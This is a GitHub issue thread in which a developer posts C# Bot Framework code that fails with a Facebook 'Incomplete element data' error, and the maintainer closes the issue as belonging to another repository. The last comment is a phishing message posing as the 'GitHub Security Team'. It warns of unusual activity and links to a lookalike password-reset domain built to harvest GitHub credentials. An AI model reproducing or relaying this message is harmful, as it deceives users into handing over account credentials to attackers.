### ISSUE TITLE
Incomplete element data: title and at least one other field (image url, subtitle or buttons) is required with non-empty 

### ISSUE THREAD

**Issue by ghost** [vjrantal/account-linking-demo-bot#3]
My message : 

```
 var msg = context.MakeMessage();

            var attachment = new
            {
                type = "template",
                payload = new
                {
                    template_type = "generic",
                   
                    elements = new 
                    {
                        title = "title",
                        image_url = "https://cdn3.iconfinder.com/data/icons/developperss/PNG/Green%20Ball.png",

                         buttons = new
                         {
                             type = "account_link",
                             url = "https://my site url"
                         }
                    }

                   
                }
            };

            msg.ChannelData = JObject.FromObject(new
            {
                attachment
            });

 await context.PostAsync(msg);
```

Error : 

> {"error":{"message":"(#100) Incomplete element data: title and at least one other field (image url, subtitle or buttons) is required with non-empty value","type":"OAuthException","code":100,"error_subcode":2018035,"fbtrace_id":"Hmi8ZNWnO8T"}}

**Comment by vjrantal** [comment]
@lonche: Seems that you opened a C#-related issue to this repository which contains Node.js implementation of the account linking so closing the issue from here.

My quick guess is that the way you construct and serialize the message is wrong.

You could check samples of how to send Facebook-specific messages from https://github.com/Microsoft/BotBuilder-Samples/tree/master/CSharp/Blog-CustomChannelData/Models

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
